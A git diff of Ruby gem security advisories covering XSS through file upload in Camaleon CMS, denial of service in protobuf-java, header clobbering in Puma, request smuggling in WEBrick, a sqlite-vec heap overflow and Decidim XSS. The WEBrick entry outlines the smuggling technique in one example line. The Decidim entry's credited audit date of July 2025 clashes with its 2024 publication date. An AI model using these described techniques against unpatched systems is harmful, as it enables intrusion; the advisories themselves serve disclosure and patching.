+  date: 2024-09-18
+  description: |
+    A stored cross-site scripting has been found in the image upload
+    functionality that can be used by normal registered users:
+    It is possible to upload a SVG image containing JavaScript and
+    it's also possible to upload a HTML document when the format
+    parameter is manually changed to [documents][1] or a string of an
+    [unsupported format][2]. If an authenticated user or administrator
+    visits that uploaded image or document malicious JavaScript can be
+    executed on their behalf
+    (e.g. changing or deleting content inside of the CMS.)
+
+    [1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106
+    [2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111
+
+    ## Impact
+
+    This issue may lead to account takeover due to reflected
+    Cross-site scripting (XSS).
+
+    ## Remediation
+
+    Only allow the upload of safe files such as PNG, TXT and others
+    or serve all "unsafe" files such as SVG and other files with a
+    content-disposition: attachment header, which should prevent
+    browsers from displaying them.
+
+    Additionally, a [Content security policy (CSP)][3]
+    can be created that disallows inlined script. (Other parts of the
+    application might need modification to continue functioning.)
+
+    [3]: https://web.dev/articles/csp
+
+    To prevent the theft of the auth_token it could be marked with
+    HttpOnly. This would however not prevent that actions could be
+    performed as the authenticated user/administrator. Furthermore,
+    it could make sense to use the authentication provided by
+    Ruby on Rails, so that stolen tokens cannot be used anymore
+    after some time.
+  cvss_v3: 5.4
+  patched_versions:
+  - ">= 2.8.1"
+  related:
+    url:
+    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
+    - https://github.com/owen2345/camaleon-cms/commit/b18fbc74f3ecd98a1f781d015f5466ef16b1425b
+    - https://github.com/advisories/GHSA-r9cr-qmfw-pmrc
+---
diff --git a/advisories/_posts/2024-09-19-CVE-2024-7254.md b/advisories/_posts/2024-09-19-CVE-2024-7254.md
index ed5658f7..3ac34032 100644
--- a/advisories/_posts/2024-09-19-CVE-2024-7254.md
+++ b/advisories/_posts/2024-09-19-CVE-2024-7254.md
@@ -1,72 +1,72 @@
----
-layout: advisory
-title: 'CVE-2024-7254 (google-protobuf): protobuf-java has potential Denial of Service
-  issue'
-comments: false
-categories:
-- google-protobuf
-advisory:
-  gem: google-protobuf
-  cve: 2024-7254
-  ghsa: 735f-pc8j-v9w8
-  url: https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-735f-pc8j-v9w8
-  title: protobuf-java has potential Denial of Service issue
-  date: 2024-09-19
-  description: |+
-    ### Summary
-    When parsing unknown fields in the Protobuf Java Lite and Full library,
-    a maliciously crafted message can cause a StackOverflow error and lead
-    to a program crash.
-
-    Reporter: Alexis Challande, Trail of Bits Ecosystem Security
-    Team <ecosystem@trailofbits.com>
-
-    Affected versions: This issue affects all versions of both the Java
-    full and lite Protobuf runtimes, as well as Protobuf for Kotlin and
-    JRuby, which themselves use the Java Protobuf runtime.
-
-    ### Severity
-    [CVE-2024-7254](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7254)
-    **High** CVSS4.0 Score 8.7 (NOTE: there may be a delay in publication)
-
-    This is a potential Denial of Service. Parsing nested groups as unknown
-    fields with DiscardUnknownFieldsParser or Java Protobuf Lite parser,
-    or against Protobuf map fields, creates unbounded recursions that can
-    be abused by an attacker.
-
-    ### Proof of Concept
-    For reproduction details, please refer to the unit tests (Protobuf Java
-    [LiteTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/lite/src/test/java/com/google/protobuf/LiteTest.java)
-    and [CodedInputStreamTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/core/src/test/java/com/google/protobuf/CodedInputStreamTest.java))
-    that identify the specific inputs that exercise this parsing weakness.
-
-    ### Remediation and Mitigation
-    We have been working diligently to address this issue and have released
-    a mitigation that is available now. Please update to the latest
-    available versions of the following packages:
-
-    * protobuf-java (3.25.5, 4.27.5, 4.28.2)
-    * protobuf-javalite (3.25.5, 4.27.5, 4.28.2)
-    * protobuf-kotlin (3.25.5, 4.27.5, 4.28.2)
-    * protobuf-kotlin-lite (3.25.5, 4.27.5, 4.28.2)
-    * com-protobuf [JRuby gem only] (3.25.5, 4.27.5, 4.28.2)
-
-  cvss_v3: 7.5
-  cvss_v4: 8.7
-  patched_versions:
-  - "~> 3.25.5"
-  - "~> 4.27.5"
-  - ">= 4.28.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-7254
-    - https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-735f-pc8j-v9w8
-    - https://github.com/protocolbuffers/protobuf/commit/4728531c162f2f9e8c2ca1add713cfee2db6be3b
-    - https://github.com/protocolbuffers/protobuf/commit/850fcce9176e2c9070614dab53537760498c926b
-    - https://github.com/protocolbuffers/protobuf/commit/9a5f5fe752a20cbac2e722b06949ac985abdd534
-    - https://github.com/protocolbuffers/protobuf/commit/ac9fb5b4c71b0dd80985b27684e265d1f03abf46
-    - https://github.com/protocolbuffers/protobuf/commit/cc8b3483a5584b3301e3d43d17eb59704857ffaa
-    - https://github.com/protocolbuffers/protobuf/commit/d6c82fc55a76481c676f541a255571e8950bb8c3
-    - https://github.com/advisories/GHSA-735f-pc8j-v9w8
-...
----
+---
+layout: advisory
+title: 'CVE-2024-7254 (google-protobuf): protobuf-java has potential Denial of Service
+  issue'
+comments: false
+categories:
+- google-protobuf
+advisory:
+  gem: google-protobuf
+  cve: 2024-7254
+  ghsa: 735f-pc8j-v9w8
+  url: https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-735f-pc8j-v9w8
+  title: protobuf-java has potential Denial of Service issue
+  date: 2024-09-19
+  description: |+
+    ### Summary
+    When parsing unknown fields in the Protobuf Java Lite and Full library,
+    a maliciously crafted message can cause a StackOverflow error and lead
+    to a program crash.
+
+    Reporter: Alexis Challande, Trail of Bits Ecosystem Security
+    Team <ecosystem@trailofbits.com>
+
+    Affected versions: This issue affects all versions of both the Java
+    full and lite Protobuf runtimes, as well as Protobuf for Kotlin and
+    JRuby, which themselves use the Java Protobuf runtime.
+
+    ### Severity
+    [CVE-2024-7254](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7254)
+    **High** CVSS4.0 Score 8.7 (NOTE: there may be a delay in publication)
+
+    This is a potential Denial of Service. Parsing nested groups as unknown
+    fields with DiscardUnknownFieldsParser or Java Protobuf Lite parser,
+    or against Protobuf map fields, creates unbounded recursions that can
+    be abused by an attacker.
+
+    ### Proof of Concept
+    For reproduction details, please refer to the unit tests (Protobuf Java
+    [LiteTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/lite/src/test/java/com/google/protobuf/LiteTest.java)
+    and [CodedInputStreamTest](https://github.com/protocolbuffers/protobuf/blob/a037f28ff81ee45ebe008c64ab632bf5372242ce/java/core/src/test/java/com/google/protobuf/CodedInputStreamTest.java))
+    that identify the specific inputs that exercise this parsing weakness.
+
+    ### Remediation and Mitigation
+    We have been working diligently to address this issue and have released
+    a mitigation that is available now. Please update to the latest
+    available versions of the following packages:
+
+    * protobuf-java (3.25.5, 4.27.5, 4.28.2)
+    * protobuf-javalite (3.25.5, 4.27.5, 4.28.2)
+    * protobuf-kotlin (3.25.5, 4.27.5, 4.28.2)
+    * protobuf-kotlin-lite (3.25.5, 4.27.5, 4.28.2)
+    * com-protobuf [JRuby gem only] (3.25.5, 4.27.5, 4.28.2)
+
+  cvss_v3: 7.5
+  cvss_v4: 8.7
+  patched_versions:
+  - "~> 3.25.5"
+  - "~> 4.27.5"
+  - ">= 4.28.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-7254
+    - https://github.com/protocolbuffers/protobuf/security/advisories/GHSA-735f-pc8j-v9w8
+    - https://github.com/protocolbuffers/protobuf/commit/4728531c162f2f9e8c2ca1add713cfee2db6be3b
+    - https://github.com/protocolbuffers/protobuf/commit/850fcce9176e2c9070614dab53537760498c926b
+    - https://github.com/protocolbuffers/protobuf/commit/9a5f5fe752a20cbac2e722b06949ac985abdd534
+    - https://github.com/protocolbuffers/protobuf/commit/ac9fb5b4c71b0dd80985b27684e265d1f03abf46
+    - https://github.com/protocolbuffers/protobuf/commit/cc8b3483a5584b3301e3d43d17eb59704857ffaa
+    - https://github.com/protocolbuffers/protobuf/commit/d6c82fc55a76481c676f541a255571e8950bb8c3
+    - https://github.com/advisories/GHSA-735f-pc8j-v9w8
+...
+---
diff --git a/advisories/_posts/2024-09-20-CVE-2024-45614.md b/advisories/_posts/2024-09-20-CVE-2024-45614.md
index 29d5b00b..4f4aecd8 100644
--- a/advisories/_posts/2024-09-20-CVE-2024-45614.md
+++ b/advisories/_posts/2024-09-20-CVE-2024-45614.md
@@ -1,51 +1,51 @@
----
-layout: advisory
-title: 'CVE-2024-45614 (puma): Puma''s header normalization allows for client to clobber
-  proxy set headers'
-comments: false
-categories:
-- puma
-advisory:
-  gem: puma
-  cve: 2024-45614
-  ghsa: 9hf4-67fc-4vf4
-  url: https://github.com/puma/puma/security/advisories/GHSA-9hf4-67fc-4vf4
-  title: Puma's header normalization allows for client to clobber proxy set headers
-  date: 2024-09-20
-  description: |
-    ### Impact
-
-    Clients could clobber values set by intermediate proxies (such as
-    X-Forwarded-For) by providing a underscore version of the same
-    header (X-Forwarded_For).
-
-    Any users trusting headers set by their proxy may be affected.
-    Attackers may be able to downgrade connections to HTTP (non-SSL)
-    or redirect responses, which could cause confidentiality leaks
-    if combined with a separate MITM attack.
-
-    ### Patches
-    v6.4.3/v5.6.9 now discards any headers using underscores if the
-    non-underscore version also exists.  Effectively, allowing the
-    proxy defined headers to always win.
-
-    ### Workarounds
-    Nginx has a [underscores_in_headers](https://nginx.org/en/docs/http/ngx_http_core_module.html#underscores_in_headers)
-    configuration variable to discard these headers at the proxy level.
-
-    Any users that are implicitly trusting the proxy defined headers
-    for security or availability should immediately cease doing so
-    until upgraded to the fixed versions.
-  cvss_v3: 5.4
-  patched_versions:
-  - "~> 5.6.9"
-  - ">= 6.4.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-45614
-    - https://github.com/puma/puma/security/advisories/GHSA-9hf4-67fc-4vf4
-    - https://github.com/puma/puma/commit/cac3fd18cf29ed43719ff5d52d9cfec215f0a043
-    - https://github.com/puma/puma/commit/f196b23be24712fb8fb16051cc124798cc84f70e
-    - https://nginx.org/en/docs/http/ngx_http_core_module.html#underscores_in_headers
-    - https://github.com/advisories/GHSA-9hf4-67fc-4vf4
----
+---
+layout: advisory
+title: 'CVE-2024-45614 (puma): Puma''s header normalization allows for client to clobber
+  proxy set headers'
+comments: false
+categories:
+- puma
+advisory:
+  gem: puma
+  cve: 2024-45614
+  ghsa: 9hf4-67fc-4vf4
+  url: https://github.com/puma/puma/security/advisories/GHSA-9hf4-67fc-4vf4
+  title: Puma's header normalization allows for client to clobber proxy set headers
+  date: 2024-09-20
+  description: |
+    ### Impact
+
+    Clients could clobber values set by intermediate proxies (such as
+    X-Forwarded-For) by providing a underscore version of the same
+    header (X-Forwarded_For).
+
+    Any users trusting headers set by their proxy may be affected.
+    Attackers may be able to downgrade connections to HTTP (non-SSL)
+    or redirect responses, which could cause confidentiality leaks
+    if combined with a separate MITM attack.
+
+    ### Patches
+    v6.4.3/v5.6.9 now discards any headers using underscores if the
+    non-underscore version also exists.  Effectively, allowing the
+    proxy defined headers to always win.
+
+    ### Workarounds
+    Nginx has a [underscores_in_headers](https://nginx.org/en/docs/http/ngx_http_core_module.html#underscores_in_headers)
+    configuration variable to discard these headers at the proxy level.
+
+    Any users that are implicitly trusting the proxy defined headers
+    for security or availability should immediately cease doing so
+    until upgraded to the fixed versions.
+  cvss_v3: 5.4
+  patched_versions:
+  - "~> 5.6.9"
+  - ">= 6.4.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-45614
+    - https://github.com/puma/puma/security/advisories/GHSA-9hf4-67fc-4vf4
+    - https://github.com/puma/puma/commit/cac3fd18cf29ed43719ff5d52d9cfec215f0a043
+    - https://github.com/puma/puma/commit/f196b23be24712fb8fb16051cc124798cc84f70e
+    - https://nginx.org/en/docs/http/ngx_http_core_module.html#underscores_in_headers
+    - https://github.com/advisories/GHSA-9hf4-67fc-4vf4
+---
diff --git a/advisories/_posts/2024-09-22-CVE-2024-47220.md b/advisories/_posts/2024-09-22-CVE-2024-47220.md
index c76111b6..7c23fd49 100644
--- a/advisories/_posts/2024-09-22-CVE-2024-47220.md
+++ b/advisories/_posts/2024-09-22-CVE-2024-47220.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2024-47220 (webrick): HTTP Request Smuggling in ruby webrick'
-comments: false
-categories:
-- webrick
-advisory:
-  gem: webrick
-  cve: 2024-47220
-  ghsa: 6f62-3596-g6w7
-  url: https://github.com/advisories/GHSA-6f62-3596-g6w7
-  title: HTTP Request Smuggling in ruby webrick
-  date: 2024-09-22
-  description: |
-    An issue was discovered in the WEBrick toolkit through 1.8.1 for Ruby.
-    It allows HTTP request smuggling by providing both a Content-Length
-    header and a Transfer-Encoding header, e.g.,
-    "GET /admin HTTP/1.1\r\n" inside of a "POST /user HTTP/1.1\r\n"
-    request.
-
-    NOTE: the supplier''s position is "Webrick should not be used in production."
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.8.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-47220
-    - https://github.com/ruby/webrick/issues/145
-    - https://github.com/ruby/webrick/pull/146/commits/d88321da45dcd230ac2b4585cad4833d6d5e8841
-    - https://github.com/ruby/webrick/commit/f5faca9222541591e1a7c3c97552ebb0c92733c7
-    - https://github.com/advisories/GHSA-6f62-3596-g6w7
----
+---
+layout: advisory
+title: 'CVE-2024-47220 (webrick): HTTP Request Smuggling in ruby webrick'
+comments: false
+categories:
+- webrick
+advisory:
+  gem: webrick
+  cve: 2024-47220
+  ghsa: 6f62-3596-g6w7
+  url: https://github.com/advisories/GHSA-6f62-3596-g6w7
+  title: HTTP Request Smuggling in ruby webrick
+  date: 2024-09-22
+  description: |
+    An issue was discovered in the WEBrick toolkit through 1.8.1 for Ruby.
+    It allows HTTP request smuggling by providing both a Content-Length
+    header and a Transfer-Encoding header, e.g.,
+    "GET /admin HTTP/1.1\r\n" inside of a "POST /user HTTP/1.1\r\n"
+    request.
+
+    NOTE: the supplier''s position is "Webrick should not be used in production."
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.8.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-47220
+    - https://github.com/ruby/webrick/issues/145
+    - https://github.com/ruby/webrick/pull/146/commits/d88321da45dcd230ac2b4585cad4833d6d5e8841
+    - https://github.com/ruby/webrick/commit/f5faca9222541591e1a7c3c97552ebb0c92733c7
+    - https://github.com/advisories/GHSA-6f62-3596-g6w7
+---
diff --git a/advisories/_posts/2024-09-23-GHSA-8fx8-3rg2-79xw.md b/advisories/_posts/2024-09-23-GHSA-8fx8-3rg2-79xw.md
index 40eb138b..58bba6e8 100644
--- a/advisories/_posts/2024-09-23-GHSA-8fx8-3rg2-79xw.md
+++ b/advisories/_posts/2024-09-23-GHSA-8fx8-3rg2-79xw.md
@@ -1,60 +1,60 @@
----
-layout: advisory
-title: 'GHSA-8fx8-3rg2-79xw (camaleon_cms): Camaleon CMS vulnerable to stored XSS
-  through user file upload (GHSL-2024-184)'
-comments: false
-categories:
-- camaleon_cms
-advisory:
-  gem: camaleon_cms
-  ghsa: 8fx8-3rg2-79xw
-  url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
-  title: Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184)
-  date: 2024-09-23
-  description: |
-    A stored cross-site scripting has been found in the image upload
-    functionality that can be used by normal registered users:
-    It is possible to upload a SVG image containing JavaScript and
-    it's also possible to upload a HTML document when the format
-    parameter is manually changed to [documents][1] or a string of
-    an [unsupported format][2]. If an authenticated user or administrator
-    visits that uploaded image or document malicious JavaScript can
-    be executed on their behalf (e.g. changing or deleting content
-    inside of the CMS.)
-
-    [1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106
-    [2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111
-
-    ## Impact
-
-    This issue may lead to account takeover due to reflected
-    Cross-site scripting (XSS).
-
-    ## Remediation
-
-    Only allow the upload of safe files such as PNG, TXT and others
-    or serve all "unsafe" files such as SVG and other files with a
-    content-disposition: attachment header, which should prevent
-    browsers from displaying them.
-
-    Additionally, a [Content security policy (CSP)][3] can be created
-    that disallows inlined script. (Other parts of the application
-    might need modification to continue functioning.)
-
-    [3]: https://web.dev/articles/csp
-
-    To prevent the theft of the auth_token it could be marked with
-    HttpOnly. This would however not prevent that actions could be
-    performed as the authenticated user/administrator. Furthermore,
-    it could make sense to use the authentication provided by
-    Ruby on Rails, so that stolen tokens cannot be used anymore
-    after some time.
-  cvss_v3: 5.4
-  patched_versions:
-  - ">= 2.8.1"
-  related:
-    url:
-    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
-    - https://github.com/rubysec/ruby-advisory-db/blob/master/gems/camaleon_cms/GHSA-r9cr-qmfw-pmrc.yml
-    - https://github.com/advisories/GHSA-8fx8-3rg2-79xw
----
+---
+layout: advisory
+title: 'GHSA-8fx8-3rg2-79xw (camaleon_cms): Camaleon CMS vulnerable to stored XSS
+  through user file upload (GHSL-2024-184)'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  ghsa: 8fx8-3rg2-79xw
+  url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
+  title: Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184)
+  date: 2024-09-23
+  description: |
+    A stored cross-site scripting has been found in the image upload
+    functionality that can be used by normal registered users:
+    It is possible to upload a SVG image containing JavaScript and
+    it's also possible to upload a HTML document when the format
+    parameter is manually changed to [documents][1] or a string of
+    an [unsupported format][2]. If an authenticated user or administrator
+    visits that uploaded image or document malicious JavaScript can
+    be executed on their behalf (e.g. changing or deleting content
+    inside of the CMS.)
+
+    [1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106
+    [2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111
+
+    ## Impact
+
+    This issue may lead to account takeover due to reflected
+    Cross-site scripting (XSS).
+
+    ## Remediation
+
+    Only allow the upload of safe files such as PNG, TXT and others
+    or serve all "unsafe" files such as SVG and other files with a
+    content-disposition: attachment header, which should prevent
+    browsers from displaying them.
+
+    Additionally, a [Content security policy (CSP)][3] can be created
+    that disallows inlined script. (Other parts of the application
+    might need modification to continue functioning.)
+
+    [3]: https://web.dev/articles/csp
+
+    To prevent the theft of the auth_token it could be marked with
+    HttpOnly. This would however not prevent that actions could be
+    performed as the authenticated user/administrator. Furthermore,
+    it could make sense to use the authentication provided by
+    Ruby on Rails, so that stolen tokens cannot be used anymore
+    after some time.
+  cvss_v3: 5.4
+  patched_versions:
+  - ">= 2.8.1"
+  related:
+    url:
+    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
+    - https://github.com/rubysec/ruby-advisory-db/blob/master/gems/camaleon_cms/GHSA-r9cr-qmfw-pmrc.yml
+    - https://github.com/advisories/GHSA-8fx8-3rg2-79xw
+---
diff --git a/advisories/_posts/2024-09-25-CVE-2024-46488.md b/advisories/_posts/2024-09-25-CVE-2024-46488.md
index b373b0f4..68096add 100644
--- a/advisories/_posts/2024-09-25-CVE-2024-46488.md
+++ b/advisories/_posts/2024-09-25-CVE-2024-46488.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2024-46488 (sqlite-vec): Heap-based Buffer Overflow in sqlite-vec'
-comments: false
-categories:
-- sqlite-vec
-advisory:
-  gem: sqlite-vec
-  cve: 2024-46488
-  ghsa: vrcx-gx3g-j3h8
-  url: https://github.com/advisories/GHSA-vrcx-gx3g-j3h8
-  title: Heap-based Buffer Overflow in sqlite-vec
-  date: 2024-09-25
-  description: |
-    sqlite-vec v0.1.1 was discovered to contain a heap buffer overflow
-    via the npy_token_next function. This vulnerability allows attackers
-    to cause a Denial of Service (DoS) via a crafted file.
-
-    Workaround for CVE in release 0.1.3.
-  cvss_v3: 9.1
-  patched_versions:
-  - ">= 0.1.3"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-46488
-    - https://github.com/asg017/sqlite-vec/releases/tag/v0.1.3
-    - https://github.com/VulnSphere/LLMVulnSphere/blob/main/VectorDB/sqlite-vec/OOBR_2.md
-    - https://github.com/advisories/GHSA-vrcx-gx3g-j3h8
----
+---
+layout: advisory
+title: 'CVE-2024-46488 (sqlite-vec): Heap-based Buffer Overflow in sqlite-vec'
+comments: false
+categories:
+- sqlite-vec
+advisory:
+  gem: sqlite-vec
+  cve: 2024-46488
+  ghsa: vrcx-gx3g-j3h8
+  url: https://github.com/advisories/GHSA-vrcx-gx3g-j3h8
+  title: Heap-based Buffer Overflow in sqlite-vec
+  date: 2024-09-25
+  description: |
+    sqlite-vec v0.1.1 was discovered to contain a heap buffer overflow
+    via the npy_token_next function. This vulnerability allows attackers
+    to cause a Denial of Service (DoS) via a crafted file.
+
+    Workaround for CVE in release 0.1.3.
+  cvss_v3: 9.1
+  patched_versions:
+  - ">= 0.1.3"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-46488
+    - https://github.com/asg017/sqlite-vec/releases/tag/v0.1.3
+    - https://github.com/VulnSphere/LLMVulnSphere/blob/main/VectorDB/sqlite-vec/OOBR_2.md
+    - https://github.com/advisories/GHSA-vrcx-gx3g-j3h8
+---
diff --git a/advisories/_posts/2024-09-25-GHSA-75j2-9gmc-m855.md b/advisories/_posts/2024-09-25-GHSA-75j2-9gmc-m855.md
index fc918d5b..1c457e57 100644
--- a/advisories/_posts/2024-09-25-GHSA-75j2-9gmc-m855.md
+++ b/advisories/_posts/2024-09-25-GHSA-75j2-9gmc-m855.md
@@ -1,61 +1,61 @@
----
-layout: advisory
-title: 'GHSA-75j2-9gmc-m855 (camaleon_cms): Camaleon CMS vulnerable to stored XSS
-  through user file upload (GHSL-2024-184)'
-comments: false
-categories:
-- camaleon_cms
-advisory:
-  gem: camaleon_cms
-  ghsa: 75j2-9gmc-m855
-  url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
-  title: Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184)
-  date: 2024-09-25
-  description: |
-    A stored cross-site scripting has been found in the image upload
-    functionality that can be used by normal registered users:
-    It is possible to upload a SVG image containing JavaScript and it's
-    also possible to upload a HTML document when the format parameter
-    is manually changed to [documents][1] or a string of an
-    [unsupported format][2]. If an authenticated user or administrator
-    visits that uploaded image or document malicious JavaScript can be
-    executed on their behalf (e.g. changing or deleting content inside
-    of the CMS.)
-
-    [1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106
-    [2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111
-
-    ## Impact
-
-    This issue may lead to account takeover due to reflected Cross-site
-    scripting (XSS).
-
-    ## Remediation
-
-    Only allow the upload of safe files such as PNG, TXT and others or
-    serve all "unsafe" files such as SVG and other files with a
-    content-disposition: attachment header, which should prevent browsers
-    from displaying them.
-
-    Additionally, a [Content security policy (CSP)][3] can be created
-    that disallows inlined script. (Other parts of the application might
-    need modification to continue functioning.)
-
-    [3]: https://web.dev/articles/csp
-
-    To prevent the theft of the auth_token it could be marked with
-    HttpOnly. This would however not prevent that actions could be
-    performed as the authenticated user/administrator. Furthermore, it
-    could make sense to use the authentication provided by Ruby on Rails,
-    so that stolen tokens cannot be used anymore after some time.
-  cvss_v3: 5.4
-  unaffected_versions:
-  - "< 2.8.0"
-  patched_versions:
-  - ">= 2.8.2"
-  related:
-    url:
-    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
-    - https://github.com/rubysec/ruby-advisory-db/blob/master/gems/camaleon_cms/GHSA-8fx8-3rg2-79xw.yml
-    - https://github.com/advisories/GHSA-75j2-9gmc-m855
----
+---
+layout: advisory
+title: 'GHSA-75j2-9gmc-m855 (camaleon_cms): Camaleon CMS vulnerable to stored XSS
+  through user file upload (GHSL-2024-184)'
+comments: false
+categories:
+- camaleon_cms
+advisory:
+  gem: camaleon_cms
+  ghsa: 75j2-9gmc-m855
+  url: https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
+  title: Camaleon CMS vulnerable to stored XSS through user file upload (GHSL-2024-184)
+  date: 2024-09-25
+  description: |
+    A stored cross-site scripting has been found in the image upload
+    functionality that can be used by normal registered users:
+    It is possible to upload a SVG image containing JavaScript and it's
+    also possible to upload a HTML document when the format parameter
+    is manually changed to [documents][1] or a string of an
+    [unsupported format][2]. If an authenticated user or administrator
+    visits that uploaded image or document malicious JavaScript can be
+    executed on their behalf (e.g. changing or deleting content inside
+    of the CMS.)
+
+    [1]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L105-L106
+    [2]: https://github.com/owen2345/camaleon-cms/blob/feccb96e542319ed608acd3a16fa5d92f13ede67/app/uploaders/camaleon_cms_uploader.rb#L110-L111
+
+    ## Impact
+
+    This issue may lead to account takeover due to reflected Cross-site
+    scripting (XSS).
+
+    ## Remediation
+
+    Only allow the upload of safe files such as PNG, TXT and others or
+    serve all "unsafe" files such as SVG and other files with a
+    content-disposition: attachment header, which should prevent browsers
+    from displaying them.
+
+    Additionally, a [Content security policy (CSP)][3] can be created
+    that disallows inlined script. (Other parts of the application might
+    need modification to continue functioning.)
+
+    [3]: https://web.dev/articles/csp
+
+    To prevent the theft of the auth_token it could be marked with
+    HttpOnly. This would however not prevent that actions could be
+    performed as the authenticated user/administrator. Furthermore, it
+    could make sense to use the authentication provided by Ruby on Rails,
+    so that stolen tokens cannot be used anymore after some time.
+  cvss_v3: 5.4
+  unaffected_versions:
+  - "< 2.8.0"
+  patched_versions:
+  - ">= 2.8.2"
+  related:
+    url:
+    - https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-r9cr-qmfw-pmrc
+    - https://github.com/rubysec/ruby-advisory-db/blob/master/gems/camaleon_cms/GHSA-8fx8-3rg2-79xw.yml
+    - https://github.com/advisories/GHSA-75j2-9gmc-m855
+---
diff --git a/advisories/_posts/2024-10-01-CVE-2024-41673.md b/advisories/_posts/2024-10-01-CVE-2024-41673.md
index a16eb5ca..b90c1aa1 100644
--- a/advisories/_posts/2024-10-01-CVE-2024-41673.md
+++ b/advisories/_posts/2024-10-01-CVE-2024-41673.md
@@ -1,43 +1,43 @@
----
-layout: advisory
-title: 'CVE-2024-41673 (decidim): Decidim has a cross-site scripting vulnerability
-  in the version control page'
-comments: false
-categories:
-- decidim
-advisory:
-  gem: decidim
-  cve: 2024-41673
-  ghsa: cc4g-m3g7-xmw8
-  url: https://github.com/decidim/decidim/security/advisories/GHSA-cc4g-m3g7-xmw8
-  title: Decidim has a cross-site scripting vulnerability in the version control page
-  date: 2024-10-01
-  description: |
-    ### Impact
-
-    The version control feature used in resources is subject to potential
-    cross-site scripting (XSS) attack through a malformed URL.
-
-    ### Workarounds
-
-    Not available
-
-    ### References
-
-    OWASP ASVS v4.0.3-5.1.3
-
-    ### Credits
-
-    This issue was discovered in a security audit organized by
-    [Open Source Politics](https://opensourcepolitics.eu/)
-    against Decidim done during July 2025.
-  cvss_v3: 7.1
-  patched_versions:
-  - ">= 0.27.8"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-41673
-    - https://github.com/decidim/decidim/security/advisories/GHSA-cc4g-m3g7-xmw8
-    - https://github.com/decidim/decidim/commit/8a18c8b1ee85a1b35ee0d8d5893f218695d15637
-    - https://github.com/advisories/GHSA-cc4g-m3g7-xmw8
----
+---
+layout: advisory
+title: 'CVE-2024-41673 (decidim): Decidim has a cross-site scripting vulnerability
+  in the version control page'
+comments: false
+categories:
+- decidim
+advisory:
+  gem: decidim
+  cve: 2024-41673
+  ghsa: cc4g-m3g7-xmw8
+  url: https://github.com/decidim/decidim/security/advisories/GHSA-cc4g-m3g7-xmw8
+  title: Decidim has a cross-site scripting vulnerability in the version control page
+  date: 2024-10-01
+  description: |
+    ### Impact
+
+    The version control feature used in resources is subject to potential
+    cross-site scripting (XSS) attack through a malformed URL.
+
+    ### Workarounds
+
+    Not available
+
+    ### References
+
+    OWASP ASVS v4.0.3-5.1.3
+
+    ### Credits
+
+    This issue was discovered in a security audit organized by
+    [Open Source Politics](https://opensourcepolitics.eu/)
+    against Decidim done during July 2025.
+  cvss_v3: 7.1
+  patched_versions:
+  - ">= 0.27.8"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-41673
+    - https://github.com/decidim/decidim/security/advisories/GHSA-cc4g-m3g7-xmw8
